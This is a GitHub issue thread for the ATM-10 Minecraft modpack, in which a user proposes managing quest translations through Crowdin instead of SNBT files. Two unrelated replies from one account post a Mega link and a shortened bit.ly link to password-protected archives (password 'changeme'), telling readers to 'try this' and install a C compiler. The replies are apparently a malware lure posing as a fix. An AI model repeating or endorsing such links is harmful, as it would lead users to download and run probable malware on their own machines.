### ISSUE TITLE
[Quests issues]: Move modpack quests translations to Crowdin

### ISSUE THREAD

**Issue by chouzz** [AllTheMods/ATM-10#554]
### Modpack Version

10-0.53

### Describe the issue

I am not sure if it's could be possible since seems modpack use snbt instead of json for localization. but many other Minecraft mods and entities (examples: [Mekanism](https://crowdin.com/project/mekanism), [enderIo](https://crowdin.com/project/modern-ender-io), [NeoForge](https://crowdin.neoforged.net/neoforge), [Applied Energistics 2](https://appliedenergistics2.crowdin.com/applied-energistics-2), [refinedstorage2](https://crowdin.com/project/refined-storage-2) use Crowdin instead of having json-s or snbt for language files. As I can see with ATM9 and ATM10 repositories, many pull requests are related to localization.

And it should help with:

- Automatically create translations pull requests using Crowdin github actions(Example from refinedstroage2: https://github.com/refinedmods/refinedstorage2/blob/develop/crowdin.yml)
- ATM teams can focus on modpack issues and don't need to review translation changes every time.
- Makes ATM modpacks more popular and friendly for non-English players.

And Crowdin translations should help with future modpack such as ATM11 or ATM12.

**Comment by pinpolhoxx** [comment]
try this
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A
Pass: changeme

you may need to install the c compiler

**Comment by pinpolhoxx** [comment]
try this
https://bit.ly/3TzaAQd

Password: changeme

you may need to install the c compiler
